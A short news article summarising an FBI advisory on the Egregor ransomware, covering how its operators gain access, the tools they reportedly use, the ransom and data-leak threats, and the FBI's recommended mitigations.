FBI Releases Advisory Warning Companies Against the Dangers of the Egregor Ransomware
The FBI has released a new advisory warning companies against the growing threat of the Egregor ransomware. It has been the FBI’s assessment that Egregor is operating as a Ransomware as a Service mode, meaning that “multiple different individuals play a part in conducting a single intrusion and ransomware event.” Because of this, the tactics, techniques, and procedures used during an Egregor ransomware attack may vary widely from instance to instance, thereby creating significant challenges for defense and mitigation.
The Egregor ransomware is known for utilizing multiple attack vectors to compromise a business’ network including targeting business network and employee personal accounts that share access with business networks or devices. The ransomware operators may use phishing emails with malicious attachments to gain access to targeted network accounts. The FBI also claims that once Egregor has gained access to their targeted network, the operators will then use common penetration testing and exploitation tools like Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind in an attempt to escalate priveleges and move laterally across a network, while also using Rclone and 7zip for data exfiltration.
The FBI strongly urges that companies affected by the Egregor not pay the ransomware as this may embolden criminals for further attacks and may fund illicit activities. It’s also important to note that in some cases, paying the ransom demanded from Egregor’s operators may not result in the recovery of the lost files. If you or your organization has been affected by the Egregor ransomware, the FBI strongly urges that you contact your local FBI office to report the crime.
The FBI lists the following mitigation techniques to protect yourself and your company:
- Back-up critical data offline
- Ensure copies of critical data are in the cloud or on an external hard drive or storage device
- Secure your back-ups and ensure data is not accessible for modifications or deletion from the system where the data resides
- Install and regularly update anti-virus or anti-malware software on all hosts
- Only use secure networks and avoid using public Wi-Fi networks
- Use two-factor authentication (2FA) and do not click on unsolicited attachments or links in emails
The Egregor ransomware threat was first discovered in September 2020 and has compromised over 150 victims worldwide. If victims refuse to pay the ransom, Egregor’s operators threaten to publish the stolen data to publicly available forums and chat rooms. Egregor is also known for physically printing their ransom note from a compromised computer’s installed printers.
Sources: